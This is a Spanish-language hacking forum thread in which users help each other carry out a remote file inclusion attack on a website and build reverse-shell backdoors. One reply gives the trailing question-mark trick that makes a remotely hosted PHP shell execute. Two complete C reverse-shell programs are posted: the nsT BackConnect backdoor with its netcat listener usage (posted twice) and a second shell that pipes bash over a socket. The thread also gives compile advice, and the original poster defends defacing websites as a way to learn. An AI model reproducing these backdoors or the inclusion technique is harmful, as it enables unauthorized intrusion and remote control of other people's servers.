Problema haciendo un RFI

Iniciado por Hacker-SN4K3, 31 Marzo 2007, 19:03 PM

0 Miembros y 1 Visitante están viendo este tema.

Hacker-SN4K3

Buenas, hacia tiempo que no me pasaba por aquí, pero ya que estoy, me gustaria saber, porqué mi server, al ejecutar la shell en .txt solo me muestra lo que hay dentro del txt. Es decir yo estoy en la pagina vulnerable:
www.paginavul.com/index.php?pagina=http://miserver.com/shell.txt
Y cuando hago eso me muestra el codigo de la shell, no la shell en si. Si la guardo con formato de imagen, me dice que no se puede mostrar porqué está dañada, y no hace su efecto.

Gracias por adelantado,
SN4K3

PD: Si algun mod lee esto, si puede que me canvie el nombre a Zander.

Crack_X

Quizas no es vulnerable? Como sabes que en verdad es vulnerable?
Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone

Hacker-SN4K3

Wow! Gracias por eso, vi un php que mostraba los archivos externos... pero no dejaba de ser un iframe :P
Y ahora, hay alguna manera de hacer un RFI a través de un iframe?

Pablo Videla

te falto esto:

www.paginavul.com/index.php?pagina=http://miserver.com/shell.txt?

el signo de interrogacion para que ejecutara la shell remota, sin el signo de interrogacion al final , la shell remota no se ejecutara... espero que te haya servido esta informacion , bye

Hacker-SN4K3

#4
La verdad que si, muchisimas gracias!
EDIT: Alguien podria compilar este backdoor de conexion inversa? O si ya lo tienen mejor, es el BackConnect. Saludos!

Nota del moderador: Si no sabes compilar 40 lineas de código en C mejor dedícate a otra cosa.

Aquí el code:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
*    client:    nc -lp 9999
*    server: ./backconnect <ip_client> 9999
*********************************
*/

#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>

int main (int argc, char **argv) {
  struct sockaddr_in sock;
  int sd;
  char command[256];

  if (argc < 3) {
   printf("%s <host> <port>\n", argv[0]);
   return 1;
  }

  close(1);

  if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
   perror(argv[0]);
   return 1;
  }

  bzero(&sock, sizeof(sock));

  sock.sin_family = AF_INET;
  sock.sin_port = htons(atoi(argv[2]));
  inet_aton(argv[1], &sock.sin_addr);

  if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
   perror(argv[0]);
   return 1;
  }

  close(2);
  dup(sd);

  bzero(command, 256);
  while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
   system(command);
   bzero(command, 256);
  }

  close(sd);
  return 0;
}

Hacker-SN4K3

Porque no se porque me da errores de que algunas librerias no las encuentra.

octalh

buen backdoor  ;D ;D

aki otro code +

/* Writed by Rozor !Sub_Level */
/* irc-hispano.org #sub_level ( xZR ) */
/* http://sincontrol.tomahost.org */
/* on C/C++ for Linux*/
/* gcc XZrshell.c -o XZrshell */
/* Name ID = /bin/cat */

   
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>



    int main()
    {
        int sck;
        struct sockaddr_in rhost;
        char *IP = "127.0.0.1"; /* Direccion ip */
        unsigned short PORT = 666; /* Puerto */
       
        rhost.sin_family = AF_INET;
        rhost.sin_port = htons(PORT);
        rhost.sin_addr.s_addr = inet_addr("127.0.0.1");
        memset(&(rhost.sin_zero), '\0', 8);
       
        sck = socket(AF_INET, SOCK_STREAM, 0);
        connect(sck, (struct sockaddr *)&rhost, sizeof(rhost));
     
       if(!fork())
       {

        setsid();
        dup2(sck, 0);
        dup2(sck, 1);
        dup2(sck, 2);       
        dup2(sck, 3);
        dup2(sck, 4);
        dup2(sck, 5);
        execl("/bin/bash", "/bin/cat", NULL);
        close(sck);
     
      }


}


es bastante sencillo pero practiko tambien

bytes

kamsky

no te debiera de dar problemas...has buscado si tienes esas librerias??
si es así al compilar incluyelas en la ruta con :   -L <ruta>
si no las tienes, bájatelas y colócalas en las rutas por defecto: /lib o /usr/lib
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

##shadow##

si, es raro, deberia funcionar, lo unico es que lo estes compilando en windows, las sys/ no te las reconoceria, esas son para linux, en caso de ser asi, usa linux o cygwin :)

Hacker-SN4K3

Cita de: Hacker-SN4K3 en  1 Abril 2007, 12:21 PM
La verdad que si, muchisimas gracias!
EDIT: Alguien podria compilar este backdoor de conexion inversa? O si ya lo tienen mejor, es el BackConnect. Saludos!

Nota del moderador: Si no sabes compilar 40 lineas de código en C mejor dedícate a otra cosa.

Aquí el code:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
*    client:    nc -lp 9999
*    server: ./backconnect <ip_client> 9999
*********************************
*/

#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>

int main (int argc, char **argv) {
  struct sockaddr_in sock;
  int sd;
  char command[256];

  if (argc < 3) {
   printf("%s <host> <port>\n", argv[0]);
   return 1;
  }

  close(1);

  if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
   perror(argv[0]);
   return 1;
  }

  bzero(&sock, sizeof(sock));

  sock.sin_family = AF_INET;
  sock.sin_port = htons(atoi(argv[2]));
  inet_aton(argv[1], &sock.sin_addr);

  if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
   perror(argv[0]);
   return 1;
  }

  close(2);
  dup(sd);

  bzero(command, 256);
  while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
   system(command);
   bzero(command, 256);
  }

  close(sd);
  return 0;
}


Mira "moderador" yo no se de que conyo vas, pero seguro que tu no naciste defaceando una web, sino que lo aprendistes, y por algo se empieza, así que te tranquilizas OK?